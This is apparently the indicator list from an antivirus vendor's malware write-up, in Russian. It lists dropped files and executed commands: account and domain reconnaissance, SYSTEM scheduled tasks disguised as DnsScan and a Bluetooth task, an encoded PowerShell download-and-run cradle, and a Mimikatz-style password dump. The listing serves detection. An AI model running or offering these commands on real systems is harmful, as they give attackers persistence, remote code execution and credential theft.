Техническая информация
- <SYSTEM32>\tasks\dnsscan
- <SYSTEM32>\tasks\microsoft\windows\bluetooths
- %WINDIR%\temp\m.ps1
- %WINDIR%\temp\mkatz.ini
- '%WINDIR%\syswow64\cmd.exe' /c net user
- '%WINDIR%\syswow64\net.exe' user
- '%WINDIR%\syswow64\net1.exe' user
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%WINDIR%\temp\svchost.exe" /F
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAb...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass "import-module %WINDIR%\temp\m.ps1;Invoke-Cats -pwds"
- '%WINDIR%\syswow64\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn DnsScan /tr "%WINDIR%\temp\svchost.exe" /F
- '%WINDIR%\syswow64\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A...
- '<SYSTEM32>\whoami.exe' /user
- '%WINDIR%\syswow64\cmd.exe' /c wmic ntdomain get domainname
- '%WINDIR%\syswow64\wbem\wmic.exe' ntdomain get domainname